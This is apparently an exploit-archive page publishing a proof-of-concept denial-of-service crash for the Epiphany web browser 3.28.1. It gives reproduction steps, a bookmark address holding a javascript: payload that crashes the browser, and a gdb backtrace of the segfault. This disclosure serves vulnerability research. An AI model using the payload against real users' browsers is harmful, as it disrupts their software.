exploit the possibilities

Epiphany Web Browser 3.28.1 Denial Of Service

Epiphany Web Browser 3.28.1 Denial Of Service
Posted Aug 23, 2018
Authored by Mishra Dhiraj

Epiphany Web Browser version 3.28.1 suffers from a denial of service vulnerability.

tags | exploit, web, denial of service
MD5 | b861883dd67141c86e6d706650ff3c80

Epiphany Web Browser 3.28.1 Denial Of Service

Change Mirror Download
# Exploit Title: Epiphany Web Browser 3.28.1 - Denial of Service (PoC)
# Author: Dhiraj Mishra
# Date: 2018-08-23
# Software: https://projects-old.gnome.org/epiphany/
# Version: 3.28.1
# CVE: N/A
# Tested on: Ubuntu 18 64bit

# Steps to reproduce:
1. Open epiphany browser
2. Bookmark any random page
3. Then navigate to bookmark properties set:
Name = Crash
Address = javascript:window.open('javascript:document.write("<script></script>");');
4. Browser any URL's and try to open the above bookmark
5. The browser crashes

# Below backtrace for your reference.

$ gdb epiphany
GNU gdb (Ubuntu 8.1-0ubuntu3) 8.1.0.20180409-git
Copyright (C) 2018 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law. Type "show copying"
and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.
For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from epiphany...(no debugging symbols found)...done.
(gdb) r
Starting program: /usr/bin/epiphany
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
[New Thread 0x7fffe08b6700 (LWP 9295)]
[New Thread 0x7fffdee4b700 (LWP 9296)]
[New Thread 0x7fffde64a700 (LWP 9297)]
[New Thread 0x7fffdcdcf700 (LWP 9298)]
[New Thread 0x7fff8fffd700 (LWP 9299)]
[New Thread 0x7fff8f7fc700 (LWP 9300)]
[New Thread 0x7fff8effb700 (LWP 9301)]
[New Thread 0x7fff8e38b700 (LWP 9302)]
[New Thread 0x7fff8db8a700 (LWP 9303)]
[New Thread 0x7fff8d389700 (LWP 9305)]
[New Thread 0x7fff77b0a700 (LWP 9310)]
[New Thread 0x7fff7598c700 (LWP 9320)]
[New Thread 0x7fff7518b700 (LWP 9321)]
[New Thread 0x7fff7498a700 (LWP 9327)]
[New Thread 0x7fff7698c700 (LWP 9334)]
[New Thread 0x7fff5ffff700 (LWP 9335)]
[New Thread 0x7fff5f7fe700 (LWP 9336)]
[New Thread 0x7fff5effd700 (LWP 9337)]
[New Thread 0x7fff5e7fc700 (LWP 9338)]
[New Thread 0x7fff5dffb700 (LWP 9339)]
[Thread 0x7fff8db8a700 (LWP 9303) exited]
[Thread 0x7fff8e38b700 (LWP 9302) exited]
[Thread 0x7fff5e7fc700 (LWP 9338) exited]
[Thread 0x7fff7698c700 (LWP 9334) exited]
[Thread 0x7fff5f7fe700 (LWP 9336) exited]
[Thread 0x7fff5effd700 (LWP 9337) exited]
[Thread 0x7fff5dffb700 (LWP 9339) exited]
[Thread 0x7fff5ffff700 (LWP 9335) exited]
Error scanning plugin /usr/lib/mozilla/plugins/libpepflashplayer.so, /usr/lib/x86_64-linux-gnu/webkit2gtk-4.0/WebKitPluginProcess returned 256 exit status
[New Thread 0x7fff5ffff700 (LWP 9399)]
[Thread 0x7fff7498a700 (LWP 9327) exited]
[New Thread 0x7fff7498a700 (LWP 9402)]
[Thread 0x7fff7498a700 (LWP 9402) exited]

Thread 22 "pool" received signal SIGSEGV, Segmentation fault.
[Switching to Thread 0x7fff5ffff700 (LWP 9399)]
0x00007ffff7b75db7 in ?? () from /usr/lib/x86_64-linux-gnu/epiphany-browser/libephymain.so
(gdb) bt
#0 0x00007ffff7b75db7 in () at /usr/lib/x86_64-linux-gnu/epiphany-browser/libephymain.so
#1 0x00007ffff7079be6 in () at /usr/lib/x86_64-linux-gnu/libgio-2.0.so.0
#2 0x00007ffff73fe7d0 in () at /usr/lib/x86_64-linux-gnu/libglib-2.0.so.0
#3 0x00007ffff73fde05 in () at /usr/lib/x86_64-linux-gnu/libglib-2.0.so.0
#4 0x00007fffefc206db in start_thread (arg=0x7fff5ffff700) at pthread_create.c:463
#5 0x00007ffff5e4c88f in clone () at ../sysdeps/unix/sysv/linux/x86_64/clone.S:95
(gdb)

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

February 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Feb 1st
    1 Files
  • 2
    Feb 2nd
    2 Files
  • 3
    Feb 3rd
    17 Files
  • 4
    Feb 4th
    15 Files
  • 5
    Feb 5th
    24 Files
  • 6
    Feb 6th
    16 Files
  • 7
    Feb 7th
    19 Files
  • 8
    Feb 8th
    1 Files
  • 9
    Feb 9th
    2 Files
  • 10
    Feb 10th
    15 Files
  • 11
    Feb 11th
    20 Files
  • 12
    Feb 12th
    12 Files
  • 13
    Feb 13th
    18 Files
  • 14
    Feb 14th
    17 Files
  • 15
    Feb 15th
    4 Files
  • 16
    Feb 16th
    4 Files
  • 17
    Feb 17th
    34 Files
  • 18
    Feb 18th
    15 Files
  • 19
    Feb 19th
    19 Files
  • 20
    Feb 20th
    20 Files
  • 21
    Feb 21st
    15 Files
  • 22
    Feb 22nd
    2 Files
  • 23
    Feb 23rd
    2 Files
  • 24
    Feb 24th
    16 Files
  • 25
    Feb 25th
    37 Files
  • 26
    Feb 26th
    0 Files
  • 27
    Feb 27th
    0 Files
  • 28
    Feb 28th
    0 Files
  • 29
    Feb 29th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2016 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close